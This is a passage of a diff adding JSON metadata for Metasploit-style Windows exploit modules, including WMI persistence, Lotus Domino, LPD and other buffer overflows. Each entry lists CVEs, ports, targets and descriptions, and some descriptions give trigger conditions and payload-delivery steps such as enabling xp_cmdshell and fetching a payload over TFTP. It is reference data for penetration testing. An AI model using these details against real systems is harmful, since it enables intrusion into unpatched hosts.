"URL-https://pastebin.com/eLG3dpYK" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb", + "is_install_path": true, + "ref_name": "windows/local/windscribe_windscribeservice_priv_esc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/wmi": { + "name": "Windows Management Instrumentation (WMI) Remote Command Execution", + "fullname": "exploit/windows/local/wmi", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module executes powershell on the remote host using the current\n user credentials or those supplied. Instead of using PSEXEC over TCP\n port 445 we use the WMIC command to start a Remote Procedure Call on\n TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel\n traffic through that session.\n\n The result is similar to psexec but with the added benefit of using\n the session's current authentication token instead of having to know\n a password or hash.\n\n The remote host must be configured to allow remote Windows Management\n Instrumentation.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106", + "URL-http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-09-23 17:41:20 +0000", + "path": "/modules/exploits/windows/local/wmi.rb", + "is_install_path": true, + "ref_name": "windows/local/wmi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/wmi_persistence": { + "name": "WMI Event Subscription Persistence", + "fullname": "exploit/windows/local/wmi_persistence", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-06-06", + "type": "exploit", + "author": [ + "Nick Tyrer <@NickTyrer>" + ], + "description": "This module will create a permanent WMI event subscription to achieve file-less persistence using one\n of five methods. The EVENT method will create an event filter that will query the event log for an EVENT_ID_TRIGGER\n (default: failed logon request id 4625) that also contains a specified USERNAME_TRIGGER (note: failed logon auditing\n must be enabled on the target for this method to work, this can be enabled using \"auditpol.exe /set /subcategory:Logon\n /failure:Enable\"). When these criteria are met a command line event consumer will trigger an encoded powershell payload.\n The INTERVAL method will create an event filter that triggers the payload after the specified CALLBACK_INTERVAL. The LOGON\n method will create an event filter that will trigger the payload after the system has an uptime of 4 minutes. The PROCESS\n method will create an event filter that triggers the payload when the specified process is started. The WAITFOR method\n creates an event filter that utilizes the Microsoft binary waitfor.exe to wait for a signal specified by WAITFOR_TRIGGER\n before executing the payload. The signal can be sent from a windows host on a LAN utilizing the waitfor.exe command\n (note: requires target to have port 445 open). Additionally a custom command can be specified to run once the trigger is\n activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a\n high integrity process. It is also recommended not to use stageless payloads due to powershell script length limitations.", + "references": [ + "URL-https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf", + "URL-https://learn-powershell.net/2013/08/14/powershell-and-events-permanent-wmi-event-subscriptions/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2024-03-12 12:17:46 +0000", + "path": "/modules/exploits/windows/local/wmi_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/wmi_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/lotus/domino_http_accept_language": { + "name": "IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow", + "fullname": "exploit/windows/lotus/domino_http_accept_language", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-05-20", + "type": "exploit", + "author": [ + "Fairuzan Roslan ", + "Earl Marcus klks " + ], + "description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 114 bytes.", + "references": [ + "CVE-2008-2240", + "OSVDB-45415", + "BID-29310", + "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Lotus Domino 7.0 on Windows 2003 SP1 English(NX)", + "Lotus Domino 7.0 on Windows 2003 SP2 English(NX)", + "Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)", + "Lotus Domino 8.0 on Windows 2003 SP1 English(NX)", + "Lotus Domino 8.0 on Windows 2003 SP2 English(NX)", + "Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/domino_http_accept_language.rb", + "is_install_path": true, + "ref_name": "windows/lotus/domino_http_accept_language", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lotus/domino_icalendar_organizer": { + "name": "IBM Lotus Domino iCalendar MAILTO Buffer Overflow", + "fullname": "exploit/windows/lotus/domino_icalendar_organizer", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-09-14", + "type": "exploit", + "author": [ + "A. Plaskett", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By\n sending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n gain arbitrary code execution.\n\n Note: In order to trigger the vulnerable code path, a valid Domino mailbox account\n is needed.", + "references": [ + "CVE-2010-3407", + "OSVDB-68040", + "ZDI-10-177", + "URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/", + "URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lotus Domino 8.5 on Windows 2000 SP4", + "Lotus Domino 8.5 on Windows Server 2003 SP0", + "Lotus Domino 8.5 on Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/domino_icalendar_organizer.rb", + "is_install_path": true, + "ref_name": "windows/lotus/domino_icalendar_organizer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lotus/domino_sametime_stmux": { + "name": "IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow", + "fullname": "exploit/windows/lotus/domino_sametime_stmux", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-05-21", + "type": "exploit", + "author": [ + "aushack ", + "riaf " + ], + "description": "This module exploits a stack buffer overflow in Lotus Domino\\'s Sametime\n Server. By sending an overly long POST request to the Multiplexer\n STMux.exe service we are able to overwrite SEH. Based on the exploit\n by Manuel Santamarina Suarez.", + "references": [ + "CVE-2008-2499", + "OSVDB-45610", + "BID-29328", + "ZDI-08-028" + ], + "platform": "Windows", + "arch": "x86", + "rport": 1533, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Lotus Sametime 7.5 on Windows Server 2000 SP4", + "Lotus Sametime 7.5 on Windows Server 2003 SP1", + "Lotus Sametime 7.5 on Windows Server 2003 SP2", + "Lotus Sametime 7.5.1 Windows Server 2003 SP2", + "Lotus Sametime 8.0.0 Windows Server 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/domino_sametime_stmux.rb", + "is_install_path": true, + "ref_name": "windows/lotus/domino_sametime_stmux", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lotus/lotusnotes_lzh": { + "name": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)", + "fullname": "exploit/windows/lotus/lotusnotes_lzh", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-24", + "type": "exploit", + "author": [ + "binaryhouse.net", + "alino <26alino@gmail.com>" + ], + "description": "This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\n parsing a malformed, specially crafted LZH file. This vulnerability was\n discovered binaryhouse.net", + "references": [ + "CVE-2011-1213", + "OSVDB-72706", + "BID-48018", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904", + "URL-http://www.ibm.com/support/docview.wss?uid=swg21500034" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal", + "Lotus Notes 8.5.2 FP2 / Windows Universal / DEP" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lotus/lotusnotes_lzh.rb", + "is_install_path": true, + "ref_name": "windows/lotus/lotusnotes_lzh", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/hummingbird_exceed": { + "name": "Hummingbird Connectivity 10 SP5 LPD Buffer Overflow", + "fullname": "exploit/windows/lpd/hummingbird_exceed", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-05-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Hummingbird Connectivity\n 10 LPD Daemon. This module has only been tested against Hummingbird\n Exceed v10 with SP5.", + "references": [ + "CVE-2005-1815", + "OSVDB-16957", + "BID-13788" + ], + "platform": "Windows", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 English SP0-SP4", + "Windows XP English SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/hummingbird_exceed.rb", + "is_install_path": true, + "ref_name": "windows/lpd/hummingbird_exceed", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/niprint": { + "name": "NIPrint LPD Request Overflow", + "fullname": "exploit/windows/lpd/niprint", + "aliases": [], + "rank": 400, + "disclosure_date": "2003-11-05", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the\n Network Instrument NIPrint LPD service. Inspired by\n Immunity's VisualSploit :-)", + "references": [ + "CVE-2003-1141", + "OSVDB-2774", + "BID-8968", + "URL-http://www.immunitysec.com/documentation/vs_niprint.html" + ], + "platform": "Windows", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "NIPrint3.EXE (TDS:0x3a045ff2)", + "Windows XP SP3", + "Windows 7 x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/niprint.rb", + "is_install_path": true, + "ref_name": "windows/lpd/niprint", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/saplpd": { + "name": "SAP SAPLPD 6.28 Buffer Overflow", + "fullname": "exploit/windows/lpd/saplpd", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .\n By sending an overly long argument, an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2008-0621", + "OSVDB-41127", + "BID-27613" + ], + "platform": "Windows", + "arch": "", + "rport": 515, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SAPlpd 6.28.0.1 (SAP Release 6.40)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/saplpd.rb", + "is_install_path": true, + "ref_name": "windows/lpd/saplpd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/lpd/wincomlpd_admin": { + "name": "WinComLPD Buffer Overflow", + "fullname": "exploit/windows/lpd/wincomlpd_admin", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n By sending an overly long authentication packet to the remote\n administration service, an attacker may be able to execute arbitrary\n code.", + "references": [ + "CVE-2008-5159", + "OSVDB-42861", + "BID-27614" + ], + "platform": "Windows", + "arch": "", + "rport": 13500, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "WinComLPD 3.0.2.623" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/lpd/wincomlpd_admin.rb", + "is_install_path": true, + "ref_name": "windows/lpd/wincomlpd_admin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/achat_bof": { + "name": "Achat Unicode SEH Buffer Overflow", + "fullname": "exploit/windows/misc/achat_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-12-18", + "type": "exploit", + "author": [ + "Peter Kasza ", + "Balazs Bucsay " + ], + "description": "This module exploits a Unicode SEH buffer overflow in Achat. By\n sending a crafted message to the default port 9256/UDP, it's possible to overwrite the\n SEH handler. Even when the exploit is reliable, it depends on timing since there are\n two threads overflowing the stack in the same time. This module has been tested on\n Achat v0.150 running on Windows XP SP3 and Windows 7.", + "references": [ + "CWE-121" + ], + "platform": "Windows", + "arch": "", + "rport": 9256, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/achat_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/achat_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/actfax_raw_server_bof": { + "name": "ActFax 5.01 RAW Server Buffer Overflow", + "fullname": "exploit/windows/misc/actfax_raw_server_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-02-05", + "type": "exploit", + "author": [ + "Craig Freyman", + "corelanc0d3r", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW\n Server can be used to transfer fax messages without any underlying protocols. To\n note significant fields in the fax being transferred, like the fax number or the\n recipient, ActFax data fields can be used. This module exploits a buffer overflow\n in the handling of the @F506 fields due to the insecure usage of strcpy. This\n module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).", + "references": [ + "OSVDB-89944", + "BID-57789", + "EDB-24467", + "URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ActFax 5.01 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/actfax_raw_server_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/actfax_raw_server_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/agentxpp_receive_agentx": { + "name": "AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow", + "fullname": "exploit/windows/misc/agentxpp_receive_agentx", + "aliases": [], + "rank": 400, + "disclosure_date": "2010-04-16", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This exploits a stack buffer overflow in the AgentX++ library, as used by\n various applications. By sending a specially crafted request, an attacker can\n execute arbitrary code, potentially with SYSTEM privileges.\n\n This module was tested successfully against master.exe as included with Real\n Network\\'s Helix Server v12. When installed as a service with Helix Server,\n the service runs as SYSTEM, has no recovery action, but will start automatically\n on boot.\n\n This module does not work with NX/XD enabled but could be modified easily to\n do so. The address", + "references": [ + "CVE-2010-1318", + "OSVDB-63919", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867" + ], + "platform": "Windows", + "arch": "", + "rport": 705, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Helix Server v12 and v13 - master.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/agentxpp_receive_agentx.rb", + "is_install_path": true, + "ref_name": "windows/misc/agentxpp_receive_agentx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ahsay_backup_fileupload": { + "name": "Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload", + "fullname": "exploit/windows/misc/ahsay_backup_fileupload", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-06-01", + "type": "exploit", + "author": [ + "Wietse Boonstra" + ], + "description": "This module exploits an authenticated insecure file upload and code\n execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute\n the upload credentials are needed, default on Ahsay Backup trial\n accounts are enabled so an account can be created.\n\n It can be exploited in Windows and Linux environments to get remote code\n execution (usualy as SYSTEM). This module has been tested successfully\n on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this\n flaw all connected clients can be configured to execute a command before\n the backup starts. Allowing an attacker to takeover even more systems\n and make it rain shells!\n\n Setting the CREATEACCOUNT to true will create a new account, this is\n enabled by default.\n If credeantials are known enter these and run the exploit.", + "references": [ + "CVE-2019-10267", + "URL-https://www.wbsec.nl/ahsay/", + "URL-http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe" + ], + "platform": "Windows", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows x86", + "Linux x86" + ], + "mod_time": "2020-12-23 11:36:38 +0000", + "path": "/modules/exploits/windows/misc/ahsay_backup_fileupload.rb", + "is_install_path": true, + "ref_name": "windows/misc/ahsay_backup_fileupload", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/ais_esel_server_rce": { + "name": "AIS logistics ESEL-Server Unauth SQL Injection RCE", + "fullname": "exploit/windows/misc/ais_esel_server_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-03-27", + "type": "exploit", + "author": [ + "Manuel Feifel" + ], + "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n AIS logistic software. The server typically listens on port 5099 without TLS.\n There could also be server listening on 5100 with TLS but the port 5099 is\n usually always open.\n The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n with the 'sa' user is in place.\n\n This module was verified on version 67 but it should also run on lower versions.\n An fixed version was created by AIS in September 2017. However most systems\n have not been updated.\n\n In regard to the payload, unless there is a closed port in the web server,\n you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n probably to your port 80 or to any other outbound port allowed on the firewall.\n\n Currently, one delivery method is supported\n\n This method takes advantage of the Command Stager subsystem. This allows using\n various techniques, such as using a TFTP server, to send the executable. By default\n the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished.", + "references": [ + "CVE-2019-10123" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 5099, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-06-10 11:44:55 +0000", + "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/ais_esel_server_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/allmediaserver_bof": { + "name": "ALLMediaServer 0.8 Buffer Overflow", + "fullname": "exploit/windows/misc/allmediaserver_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-04", + "type": "exploit", + "author": [ + "motaz reda ", + "modpr0be ", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability\n is caused due to a boundary error within the handling of HTTP request.\n\n While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't\n reliable across virtual (VMWare, VirtualBox) and physical environments. Because of\n this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default\n DEP is OptIn and AllMediaServer won't run with DEP.", + "references": [ + "CVE-2017-17932", + "OSVDB-83889", + "EDB-19625" + ], + "platform": "Windows", + "arch": "", + "rport": 888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ALLMediaServer 0.8 / Windows XP SP3 - English", + "ALLMediaServer 0.8 / Windows 7 SP1 - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/allmediaserver_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/allmediaserver_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/altiris_ds_sqli": { + "name": "Symantec Altiris DS SQL Injection", + "fullname": "exploit/windows/misc/altiris_ds_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-05-15", + "type": "exploit", + "author": [ + "Brett Moore", + "3v0lver" + ], + "description": "This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8\n to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize\n numeric input fields in \"UpdateComputer\" notification Requests. In order to spawn a shell,\n several SQL injections are required in close succession, first to enable xp_cmdshell, then\n retrieve the payload via TFTP and finally execute it. The module also has the capability\n to disable or enable local application authentication. In order to work the target system\n must have a tftp client available.", + "references": [ + "CVE-2008-2286", + "OSVDB-45313", + "BID-29198", + "URL-http://www.zerodayinitiative.com/advisories/ZDI-08-024" + ], + "platform": "Windows", + "arch": "", + "rport": 402, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 (with tftp client available)" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/misc/altiris_ds_sqli.rb", + "is_install_path": true, + "ref_name": "windows/misc/altiris_ds_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/apple_quicktime_rtsp_response": { + "name": "Apple QuickTime 7.3 RTSP Response Header Buffer Overflow", + "fullname": "exploit/windows/misc/apple_quicktime_rtsp_response", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-11-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long\n RTSP response to a client, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-6166", + "OSVDB-40876", + "BID-26549", + "EDB-4648" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "QuickTime 7.3, QuickTime Player 7.3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb", + "is_install_path": true, + "ref_name": "windows/misc/apple_quicktime_rtsp_response", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/asus_dpcproxy_overflow": { + "name": "Asus Dpcproxy Buffer Overflow", + "fullname": "exploit/windows/misc/asus_dpcproxy_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-03-21", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.\n It should be vulnerable until version 2.0.0.24.\n Credit to Luigi Auriemma", + "references": [ + "CVE-2008-1491", + "OSVDB-43638", + "BID-28394" + ], + "platform": "Windows", + "arch": "", + "rport": 623, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Asus Dpcroxy version 2.00.19 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb", + "is_install_path": true, + "ref_name": "windows/misc/asus_dpcproxy_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/avaya_winpmd_unihostrouter": { + "name": "Avaya WinPMD UniteHostRouter Buffer Overflow", + "fullname": "exploit/windows/misc/avaya_winpmd_unihostrouter", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-23", + "type": "exploit", + "author": [ + "AbdulAziz Hariri", + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability\n exists in the UniteHostRouter service, due to the insecure usage of memcpy when\n parsing specially crafted \"To:\" headers. The module has been tested successfully on\n Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.", + "references": [ + "OSVDB-82764", + "OSVDB-73269", + "BID-47947", + "EDB-18397", + "URL-https://downloads.avaya.com/css/P8/documents/100140122", + "URL-http://web.archive.org/web/20110527165515/http://secunia.com:80/advisories/44062" + ], + "platform": "Windows", + "arch": "", + "rport": 3217, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Avaya WinPMD 3.8.2 / Windows XP SP3", + "Avaya WinPMD 3.8.2 / Windows 2003 SP2" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb", + "is_install_path": true, + "ref_name": "windows/misc/avaya_winpmd_unihostrouter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/avidphoneticindexer": { + "name": "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow", + "fullname": "exploit/windows/misc/avidphoneticindexer", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-29", + "type": "exploit", + "author": [ + "vt [nick.freeman " + ], + "description": "This module exploits a stack buffer overflow in process\n AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer\n 5.5 Editing Suite. This daemon sometimes starts on a different port; if you start\n it standalone it will run on port 4660.", + "references": [ + "CVE-2011-5003", + "OSVDB-77376", + "URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 4659, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Professional SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/avidphoneticindexer.rb", + "is_install_path": true, + "ref_name": "windows/misc/avidphoneticindexer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bakbone_netvault_heap": { + "name": "BakBone NetVault Remote Heap Overflow", + "fullname": "exploit/windows/misc/bakbone_netvault_heap", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-04-01", + "type": "exploit", + "author": [ + "hdm ", + "nolimit.bugtraq " + ], + "description": "This module exploits a heap overflow in the BakBone NetVault\n Process Manager service. This code is a direct port of the netvault.c\n code written by nolimit and BuzzDee.", + "references": [ + "CVE-2005-1009", + "OSVDB-15234", + "BID-12967" + ], + "platform": "Windows", + "arch": "", + "rport": 20031, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP4 English", + "Windows XP SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bakbone_netvault_heap.rb", + "is_install_path": true, + "ref_name": "windows/misc/bakbone_netvault_heap", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bcaaa_bof": { + "name": "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow", + "fullname": "exploit/windows/misc/bcaaa_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-04", + "type": "exploit", + "author": [ + "Paul Harrington", + "Travis Warren", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n which comes as part of the Blue Coat Authentication proxy. Please note that by default,\n this exploit will attempt up to three times in order to successfully gain remote code\n execution (in some cases, it takes as many as five times). This can cause your activity\n to look even more suspicious. To modify the number of exploit attempts, set the\n ATTEMPTS option.", + "references": [ + "CVE-2011-5124", + "OSVDB-72095", + "URL-https://kb.bluecoat.com/index?page=content&id=SA55", + "URL-https://seclists.org/bugtraq/2011/Jul/44" + ], + "platform": "Windows", + "arch": "", + "rport": 16102, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BCAAA Version 5.4.6.1.54128" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bcaaa_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/bcaaa_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server": { + "name": "BigAnt Server 2.2 Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server", + "aliases": [], + "rank": 200, + 